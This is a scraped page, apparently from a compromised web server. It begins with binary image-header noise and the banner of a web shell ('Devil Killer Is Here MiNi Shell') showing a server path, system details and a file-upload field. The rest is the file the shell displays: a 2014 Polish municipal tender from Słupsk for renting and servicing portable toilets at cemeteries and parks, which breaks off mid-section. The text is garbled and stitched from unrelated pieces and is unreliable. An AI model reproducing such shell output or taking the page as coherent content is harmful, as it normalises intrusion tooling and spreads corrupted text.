JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140331/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140331/68205-N-2014.html

<p class="kh_header"><b>Słupsk: Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych na cmentarzach komunalnych i terenach zieleni miejskiej w Słupsku</b><br>
<b>Numer ogłoszenia: 68205 - 2014; data zamieszczenia: 31.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Infrastruktury Miejskiej w Słupsku , ul. Przemysłowa 73, 76-200 Słupsk, woj. pomorskie, tel. +48 59 841 00 91, faks +48 59 848 37 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zimslupsk.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych na cmentarzach komunalnych i terenach zieleni miejskiej w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje świadczenie usługi w zakresie wynajmu, transportu, ustawienia i serwisów przenośnych kabin sanitarnych, który został umownie podzielony na trzy odrębne zadania:
1) zadanie 1 - Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych na cmentarzu komunalnym w Słupsku przy ul. Rabina dr. Maxa Josepha 4 i przy ul. Zachodniej.
2) zadanie 2 - Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych w Parku Kultury i Wypoczynku (PKiW) zlokalizowany pomiędzy ulicami Rybacką, Drewnianą i Zamkową.
3) zadanie 3 - Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych na bulwarze im. Bł. Ks. Jerzego Popiełuszki przy rzece Słupi zlokalizowanego od ul. Kilińskiego wzdłuż ul. Francesco Nullo do ul. Mostnika i skwerze przy ul. Kościuszki.
2. WYMAGANIA OGÓLNE.
1) Przenośne kabiny sanitarne muszą być wyposażone w:
a) szczelny, bezodpływowy zbiornik na fekalia o pojemności nie mniejszej niż 220 litrów                                 z odpowietrzeniem grawitacyjnym,
b) deskę sedesową,
c) pisuar z odprowadzeniem do zbiornika,
d) pojemnik na dwie rolki papieru toaletowego,
e) antypoślizgową podłogę,
f) zamek wewnętrzny ze wskaźnikiem - wolne/zajęte,
g) wieszak na ubranie.
2) Kabiny sanitarne muszą spełniać następujące parametry techniczne:
a) wysokość kabiny: powyżej 2 m,
b) szerokość kabiny: około 1,10 m,
c) waga kabiny: 70 - 95 kg.
3) Kabiny muszą być przez Wykonawcę ubezpieczone od kradzieży i dewastacji.
4) Wynajem przenośnych kabin sanitarnych obejmuje oddanie kabin do używania, transport i ustawienie we wskazanych przez Zamawiającego miejscach, i w wyznaczonym dniu oraz zabranie ich po zakończeniu realizacji usługi.
5) Serwis przenośnych kabin sanitarnych polega na:
a) równym, stabilnym i bezpiecznym ustawieniu kabiny
b) opróżnianiu pojemnika na fekalia,
c) myciu kabin oraz zbiornika z zewnątrz i wewnątrz,
d) dezynfekcji kabin i zbiornika z zewnątrz i wewnątrz,
e) zalaniu zbiornika świeżym koncentratem dezynfekująco - zapachowym,
f) uzupełnieniu papieru toaletowego,
g) sprawdzeniu stanu technicznego i wykonaniu drobnych napraw podczas serwisu lub ustawieniu innej - sprawnej technicznie kabiny sanitarnej.
6) Zamawiający wymaga, aby w trakcie realizacji zamówienia Wykonawca dysponował przenośnymi kabinami sanitarnymi w ilości 17 sztuk.
3. Zamawiający zastrzega sobie prawo do wnoszenia zmian w trakcie realizacji zamówienia do:
1) określenia lokalizacji ustawienia kabin sanitarnych, 
2) przesunięcia okresu realizacji serwisów,
3) awaryjnego zamówienia serwisów, poza ustalonym harmonogramem, z czasem oczekiwania na wykonanie zamówionych serwisów do 2 godzin od telefonicznego zgłoszenia przez Zamawiającego konieczności ich wykonania.
4. Kompleksowa obsługa przenośnych kabin sanitarnych obejmuje transport, ustawienie, serwisy i usunięcie przenośnych kabin sanitarnych zgodnie z zapisami zawartymi w opisie poszczególnych zadań.
5. Wykonawca bez względu na to, czy będzie składał ofertę na jedno zadanie, dwa zadania lub trzy zadania jest zobowiązany prowadzić działalność obejmującą wynajem i obsługę przenośnych kabin sanitarnych oraz posiadać stosowne zezwolenie w zakresie wykonywanej usługi wymagane przepisami prawa.
6. Wykonawca będzie ponosił odpowiedzialność wobec Zamawiającego lub osób trzecich za ewentualne szkody powstałe w wyniku niewłaściwego wykonywania usług. Wykonawca bez względu na to, czy będzie składał ofertę na jedno zadanie, dwa zadania lub trzy zadania musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w każdym roku obowiązywania umowy.
7. Wykonawca zobowiązany jest do zabezpieczenia nieczystości płynnych odebranych z kabin sanitarnych w czasie ich transportu i unieszkodliwienia ww. nieczystości zgodnie z regulacją prawną w tym zakresie. Z momentem odbioru nieczystości na Wykonawcy ciążą obowiązki i odpowiedzialność wynikające z przepisów prawnych o ochronie środowiska, szczególnie ustawy z dnia 14 grudnia 2012 r.  o odpadach (Dz. U. z 2013 r., poz. 21).
8. Wykonawca zapewni kompletne kierownictwo, siłę roboczą, materiały, sprzęt i inne urządzenia niezbędne do wykonania przedmiotu zamówienia.
9. Realizację usługi w zakresie wynajmu i serwisu kabin sanitarnych należy zgłosić osobie wyznaczonej przez Zamawiającego do kontroli prac wynikających z zakresu poszczególnych zadań.
10. Przedmiot zamówienia obejmuje również wszystkie prace i obowiązki Wykonawcy wymienione we wzorze umowy, który stanowi załącznik nr 9 do SIWZ.
11. Wykonawca odpowiadać będzie wobec Zamawiającego za wszelkie szkody wyrządzone Zamawiającemu przez pracowników Wykonawcy oraz osoby trzecie w przypadku nie dołożenia przez Wykonawcy należytej staranności przy wykonywaniu przedmiotu zamówienia.
12. Organizacja pracy podczas wykonywania przedmiotu zamówienia winna odpowiadać wymaganiom określonym w aktualnych przepisach dotyczących bezpieczeństwa i higieny pracy oraz musi zapewniać prawidłowe wykonanie usługi.
13. PODWYKONAWSTWO.
1) Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcy, lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. Wskazanie niniejszego nastąpi w oświadczeniu Wykonawcy znajdującym się w formularzu oferty. W przypadku braku określenia podwykonawców Zamawiający uzna, iż przedmiot zamówienia zostanie samodzielnie wykonany przez Wykonawcę.
2) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1,  Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 50 % zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego w sytuacji, gdy wykonanie zamówienia uzupełniającego stanie się niezbędne</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Warunek zostanie uznany za spełniony na podstawie złożonego oświadczenia o spełnianiu warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt 1) ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Bez względu na to, czy Wykonawca będzie składał ofertę na jedno zadanie, dwa zadania lub trzy zadania Zamawiający uzna udokumentowanie wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywania usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej usługi polegającej na wykonywaniu usługi wynajmu i serwisu co najmniej dwóch przenośnych kabin sanitarnych w ramach tej usługi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Bez względu na to, czy Wykonawca będzie składał ofertę na jedno zadanie, dwa zadania lub trzy zadania Zamawiający uzna udokumentowanie dysponowania co najmniej dwoma sprawnymi samochodami wyposażonymi w urządzenia do mycia i dezynfekowania kabin, opróżniania zbiorników i transportowania nieczystości ciekłych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Bez względu na to, czy Wykonawca będzie składał ofertę na jedno zadanie, dwa zadania lub trzy zadania Zamawiający uzna za spełnienie warunku udokumentowanie dysponowaniem co najmniej 3 osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie i uprawnienia/kwalifikacje, odpowiednie do zakresu wykonywanych przez nie czynności oraz gwarantującymi właściwą jakość wykonywanej usługi, w tym co najmniej 1 osobą do kierowania pracami, odpowiedzialną za realizację zamówienia posiadającą minimum 2-letnie doświadczenie na stanowisku kierowniczym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Warunek zostanie uznany za spełniony na podstawie złożonego oświadczenia o spełnianiu warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt 4) ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub  miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdz. III.4.3.1) niniejszego ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, z zachowaniem terminów podanych w rozdz. III.4.3.1) niniejszego ogłoszenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, dotyczących:
1) zmiany osób wskazanych w umowie po stronie Wykonawcy, z zastrzeżeniem, że proponowane osoby spełniają wymagania określone w SIWZ,
2) zmiany zakresu prac, które Wykonawca będzie wykonywał sam i przy pomocy podwykonawców,
3) zmiany podmiotów trzecich na etapie realizacji zamówienia, na zasobach których Wykonawca opierał się wskazując spełnianie warunków udziału w postępowaniu, z zastrzeżeniem, że spełnione są warunki udziału w postępowaniu określone w SIWZ,
4) innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zimslupsk.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Infrastruktury Miejskiej w Słupsku, ul. Przemysłowa 73, 76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2014 godzina 10:00, miejsce: Zarząd Infrastruktury Miejskiej w Słupsku, ul. Przemysłowa 73, 76-200 Słupsk, pok. nr 101 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych na cmentarzu komunalnym w Słupsku przy ul. Rabina dr. Maxa Josepha 4 i przy ul. Zachodniej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis zadania 1:
1. Trzy przenośne kabiny sanitarne w okresie 36 miesięcy planowanej realizacji zamówienia  należy ustawić na następujących terenach: dwie przenośne kabiny sanitarne należy ustawić we wskazanych przez Zamawiającego miejscach na terenie cmentarza komunalnego przy ul. Rabina dr. Maxa Josepha 4 oraz jedną przenośną kabinę sanitarną na cmentarzu komunalnym przy ul. Zachodniej. Kabiny należy usunąć po zakończeniu obowiązywania umowy. 
Wykonawca także w okresie od stycznia do kwietnia każdego roku trwania umowy musi wykonać serwisy, które winny odbywać się jeden raz w tygodniu, w piątki, natomiast                           w okresie od maja do grudnia każdego roku obowiązywania umowy dwa razy w tygodniu,                 w piątki i poniedziałki. Serwisy winny odbywać się rano między godziną 8:00 a godziną 10:00.
2. Dziesięć przenośnych kabin sanitarnych w okresie od dnia 20 października do dnia                            07 listopada każdego roku trwania umowy należy ustawić we wskazanych przez Zamawiającego miejscach tj. 
a) siedem przenośnych kabin sanitarnych na terenie cmentarza komunalnego przy ul. Rabina dr. Maxa Josepha 4,
b) trzy przenośne kabiny sanitarne na cmentarzu komunalnym przy ul. Zachodniej. 
Po tym terminie, każdego roku obowiązywania umowy kabiny należy usunąć.
Zamawiający przed każdym okresem obejmującym Wszystkich Świętych przedstawi Wykonawcy terminarz zamówionych serwisów. Każdego roku obowiązywania umowy będzie to nie mniej niż sześć serwisów.
3. Liczba niezbędnych serwisów przez cały okres obowiązywania umowy wynosi 987.
4. Liczba serwisów w zadaniu 1 nie powinna przekroczyć 1000 sztuk przez czas trwania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wynajem i kompleksowa obsługa przenośnych kabin sanitarnych zlokalizowanych w Parku Kultury i Wypoczynku (PKiW) zlokalizowany pomiędzy ulicami Rybacką, Drewnianą i Zamkową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis zadania 2:
1. W okresie od dnia 01 czerwca do 30 września każdego roku trwania umowy dwie przenośne kabiny sanitarne należy ustawić we wskazanych przez Zamawiającego miejscach na terenie PKiW:
a) jedną przenośną kabinę sanitarną w tzw. starej części PKiW (od strony ul. Zamkowej),
b) jedną przenośną kabinę w tzw. nowej części PKiW (od strony ul. Rybackiej).
2. Liczba niezbędnych serwisów przez cały okres obowiązywania umowy wynosi 264. 
